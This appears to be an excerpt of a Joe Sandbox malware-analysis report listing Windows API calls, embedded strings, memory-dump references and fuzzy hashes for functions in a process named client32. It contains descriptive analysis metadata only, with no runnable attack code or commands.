                                                                                                                • Opcode Fuzzy Hash: 9735d3e61c58080a89fa20c82b25ab644093a8acf898cd5def549394436bc947
                                                                                                                • Instruction Fuzzy Hash: 9301D276A04216ABF34115BD6D01FABBB8C8BD2A78F240173F84DD6A81E752E41681A2
                                                                                                                APIs
                                                                                                                • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100EE52
                                                                                                                  • Part of subcall function 111616DA: _setlocale.LIBCMT ref: 111616EC
                                                                                                                • _free.LIBCMT ref: 1100EE64
                                                                                                                  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                                                  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                                • _free.LIBCMT ref: 1100EE77
                                                                                                                • _free.LIBCMT ref: 1100EE8A
                                                                                                                • _free.LIBCMT ref: 1100EE9D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                                                                                • String ID:
                                                                                                                • API String ID: 3515823920-0
                                                                                                                • Opcode ID: ed7eb8e9888c5118949983cd0268dd79b6cba560ecac2a4a446fb5dc8afa845e
                                                                                                                • Instruction ID: a44a88996e3d62c283fa82fd04d5e1258298656dbf2da44853d36c331dab430a
                                                                                                                • Opcode Fuzzy Hash: ed7eb8e9888c5118949983cd0268dd79b6cba560ecac2a4a446fb5dc8afa845e
                                                                                                                • Instruction Fuzzy Hash: 9511B2F2D046559BE720CF99D800A5BFBECEB50764F144A2AE49AD3640E7B2F904CA51
                                                                                                                APIs
                                                                                                                  • Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                                                  • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
                                                                                                                  • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                                                                • wsprintfA.USER32 ref: 1114650E
                                                                                                                • wsprintfA.USER32 ref: 11146524
                                                                                                                  • Part of subcall function 11143E00: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1111025B,75A38400,?), ref: 11143E97
                                                                                                                  • Part of subcall function 11143E00: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11143EB7
                                                                                                                  • Part of subcall function 11143E00: CloseHandle.KERNEL32(00000000), ref: 11143EBF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
                                                                                                                • String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
                                                                                                                • API String ID: 3779116287-2600120591
                                                                                                                • Opcode ID: b80d813afa46409255703ba7a7584a715aa6e7e8051bc230ff80af9931e0e18b
                                                                                                                • Instruction ID: d6aa3785d543843f1191885663c1f1b2da884e9fda22ce0040deef08ed208be3
                                                                                                                • Opcode Fuzzy Hash: b80d813afa46409255703ba7a7584a715aa6e7e8051bc230ff80af9931e0e18b
                                                                                                                • Instruction Fuzzy Hash: 7B01B5BA90122DA6CB10DBB09D41FDEF77CCB1460DF5005A5E8099A540EE60BE44DBD1
                                                                                                                APIs
                                                                                                                • CoInitialize.OLE32(00000000), ref: 110F4B8A
                                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110F4BAA
                                                                                                                • TranslateMessage.USER32(?), ref: 110F4BC4
                                                                                                                • DispatchMessageA.USER32(?), ref: 110F4BCA
                                                                                                                • CoUninitialize.OLE32 ref: 110F4BE6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Message$DispatchInitializeTranslateUninitialize
                                                                                                                • String ID:
                                                                                                                • API String ID: 3550192930-0
                                                                                                                • Opcode ID: cc0c84c49c7e2416c752fb198c95613c6e3beb4d5de04bc6f877ef0d92a8c20d
                                                                                                                • Instruction ID: c6f08b4013ced19d6869e69a0d946a3ee91e256cb2334e467ebd10f862add052
                                                                                                                • Opcode Fuzzy Hash: cc0c84c49c7e2416c752fb198c95613c6e3beb4d5de04bc6f877ef0d92a8c20d
                                                                                                                • Instruction Fuzzy Hash: A301CC35D0131E9BEB24DAA0DD85F99B3F8AF48719F0002AAE915E2181E774E5048B61
                                                                                                                APIs
                                                                                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1111025B,75A38400,?), ref: 11143E97
                                                                                                                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11143EB7
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 11143EBF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile$CloseHandle
                                                                                                                • String ID: "
                                                                                                                • API String ID: 1443461169-123907689
                                                                                                                • Opcode ID: 7a1e0e4b99865e682fb8aefe1b378640ee8558a614cdda32459534f13f8ca753
                                                                                                                • Instruction ID: 3d5505e67506a11152adc20893aebb2e29c51f354ea5d43c8ad60c1cab3f6bda
                                                                                                                • Opcode Fuzzy Hash: 7a1e0e4b99865e682fb8aefe1b378640ee8558a614cdda32459534f13f8ca753
                                                                                                                • Instruction Fuzzy Hash: 5921BB31A092B9AFE332CE38DD54BD9BB989B42B14F3002E0E4D5AB5C1DBB19948C750
                                                                                                                APIs
                                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                • SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,0BAD89F8,771B2EE0,?,00000000,111821CB,000000FF,?,11030776,UseIPC,00000001,00000000), ref: 1102D8E7
                                                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                                  • Part of subcall function 11110280: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,7774C3F0,?,11110F3D,00000000,00000001,?,?,?,?,?,11031700), ref: 1111029E
                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 1102D8AA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Event$Create$__wcstoi64_malloc_memsetwsprintf
                                                                                                                • String ID: Client$DisableGeolocation
                                                                                                                • API String ID: 3315423714-4166767992
                                                                                                                • Opcode ID: 4f9a6887a53d08cfe871fa0f2f67aa86f35001991e889a0500aa779ebc83bfef
                                                                                                                • Instruction ID: cbdab4fc78c667aa17d7f52ea236f8f509ff794b1425e8be210dc820fee18f51
                                                                                                                • Opcode Fuzzy Hash: 4f9a6887a53d08cfe871fa0f2f67aa86f35001991e889a0500aa779ebc83bfef
                                                                                                                • Instruction Fuzzy Hash: 4921D374B41365AFE312CFA4CD41FA9F7A4E704B08F10066AF925AB7C4D7B5B8008B88
                                                                                                                APIs
                                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1102783A
                                                                                                                  • Part of subcall function 110CD940: EnterCriticalSection.KERNEL32(00000000,00000000,75A33760,00000000,75A4A1D0,1105E7CB,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD95B
                                                                                                                  • Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD988
                                                                                                                  • Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD99A
                                                                                                                  • Part of subcall function 110CD940: LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9A4
                                                                                                                • TranslateMessage.USER32(?), ref: 11027850
                                                                                                                • DispatchMessageA.USER32(?), ref: 11027856
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
                                                                                                                • String ID: Exit Msgloop, quit=%d
                                                                                                                • API String ID: 3212272093-2210386016
                                                                                                                • Opcode ID: 1e7707140bc2ef53bb668a28125e94940fa22640bbb246be592d1b9c462dd20f
                                                                                                                • Instruction ID: 817b53cccd486bf52806c908fc33d3d0e945c232de97a35441108a60357cf637
                                                                                                                • Opcode Fuzzy Hash: 1e7707140bc2ef53bb668a28125e94940fa22640bbb246be592d1b9c462dd20f
                                                                                                                • Instruction Fuzzy Hash: 4C01FC76E8222A66E704DBE59C81FABF7AC9754B08F8040B5EA1493185E7A4B005C7E5
                                                                                                                APIs
                                                                                                                • GetTickCount.KERNEL32 ref: 110179ED
                                                                                                                  • Part of subcall function 110178F0: WaitForSingleObject.KERNEL32(00000324,000000FF), ref: 1101792C
                                                                                                                  • Part of subcall function 110178F0: CoInitialize.OLE32(00000000), ref: 11017935
                                                                                                                  • Part of subcall function 110178F0: _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101795C
                                                                                                                  • Part of subcall function 110178F0: CoUninitialize.COMBASE ref: 110179C0
                                                                                                                  • Part of subcall function 11017810: WaitForSingleObject.KERNEL32(00000324,000000FF), ref: 11017842
                                                                                                                  • Part of subcall function 11017810: CoInitialize.OLE32(00000000), ref: 1101784B
                                                                                                                  • Part of subcall function 11017810: _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017872
                                                                                                                  • Part of subcall function 11017810: CoUninitialize.COMBASE ref: 110178D0
                                                                                                                • SetEvent.KERNEL32(00000324), ref: 11017A0D
                                                                                                                • GetTickCount.KERNEL32 ref: 11017A13
                                                                                                                Strings
                                                                                                                • touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 11017A1D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CountInitializeObjectSingleStringTickUninitializeW@16Wait$Event
                                                                                                                • String ID: touchkbd, systype=%d, chassis=%d, took %d ms
                                                                                                                • API String ID: 3804766296-4122679463
                                                                                                                • Opcode ID: 610e40d61194c34f9e635cc577eb4e6ba02d92eb7ed74a53a25a0e307046be88
                                                                                                                • Instruction ID: 40d604bc36e6f054513ad574895ebf983a142e9fcea0f5d6417744b2b8156d0d
                                                                                                                • Opcode Fuzzy Hash: 610e40d61194c34f9e635cc577eb4e6ba02d92eb7ed74a53a25a0e307046be88
                                                                                                                • Instruction Fuzzy Hash: 74F0A0B6E8021C6FE700DBF99D89E6EB79CDB44318B100436E914C7201E9A2BC1187A1
                                                                                                                APIs
                                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                • CreateThread.KERNEL32(00000000,00001000,Function_00138580,00000000,00000000,111396D2), ref: 1113877E
                                                                                                                • CloseHandle.KERNEL32(00000000,?,111396D2,AutoICFConfig,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11138785
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreateHandleThread__wcstoi64
                                                                                                                • String ID: *AutoICFConfig$Client
                                                                                                                • API String ID: 3257255551-59951473
                                                                                                                • Opcode ID: 8ef9440ca52eb6c28e2eb8d9bc5eaacf11d3a77b41f44fd575e1b178a618d9bf
                                                                                                                • Instruction ID: 465e4da249eed1782d5a870e25bf0fc53578c4739eb9f60baa785aa5b16743b3
                                                                                                                • Opcode Fuzzy Hash: 8ef9440ca52eb6c28e2eb8d9bc5eaacf11d3a77b41f44fd575e1b178a618d9bf
                                                                                                                • Instruction Fuzzy Hash: 93E0D8397A0319BBF2108BE28D4BFA0FB5D9700766F100324FB34650C8E6A0B4408755
                                                                                                                APIs
                                                                                                                • Sleep.KERNEL32(000000FA), ref: 11070FE7
                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 11070FF4
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 110710C6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$EnterLeaveSleep
                                                                                                                • String ID: Push
                                                                                                                • API String ID: 1566154052-4278761818
                                                                                                                • Opcode ID: 74813a05ea0db766d7d3990c23e63c1b548e25f4805cfc9f05432d5c18842b54
                                                                                                                • Instruction ID: 0680e92de3a1cb6b94a8841711a201229b8bffd134bed54c98ff914dc8d571b6
                                                                                                                • Opcode Fuzzy Hash: 74813a05ea0db766d7d3990c23e63c1b548e25f4805cfc9f05432d5c18842b54
                                                                                                                • Instruction Fuzzy Hash: 2A51CF75E04685DFE322CF64C884B96FBE2EF04314F058199E8A98B281D770BD44CB90
                                                                                                                APIs
                                                                                                                • GetCommandLineW.KERNEL32 ref: 00651027
                                                                                                                • GetStartupInfoW.KERNEL32(?), ref: 00651081
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000000,00000000,?), ref: 0065109C
                                                                                                                • ExitProcess.KERNEL32 ref: 006510A9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3698267949.0000000000651000.00000020.00000001.01000000.00000007.sdmp, Offset: 00650000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3697347028.0000000000650000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3698855636.0000000000652000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_650000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                                                                                                • String ID:
                                                                                                                • API String ID: 2164999147-0
                                                                                                                • Opcode ID: f59eb50c02ae130bbbc131efa8dd606c5ca49e8bbcacb37057854b80a5da94cd
                                                                                                                • Instruction ID: a56eccb439bcc3dc1cd6e2827e4703fb23f28ed2cb22b3b5811e298592c1b47f
                                                                                                                • Opcode Fuzzy Hash: f59eb50c02ae130bbbc131efa8dd606c5ca49e8bbcacb37057854b80a5da94cd
                                                                                                                • Instruction Fuzzy Hash: C601C065C003A196DB306F9088053FB76BAAF12383F514415ECCAAB2C1FB648CC9C2A5
                                                                                                                APIs
                                                                                                                • WaitForSingleObject.KERNEL32(?,000001F4), ref: 11030DBC
                                                                                                                • CloseHandle.KERNEL32(?), ref: 11030DC9
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 11030DD4
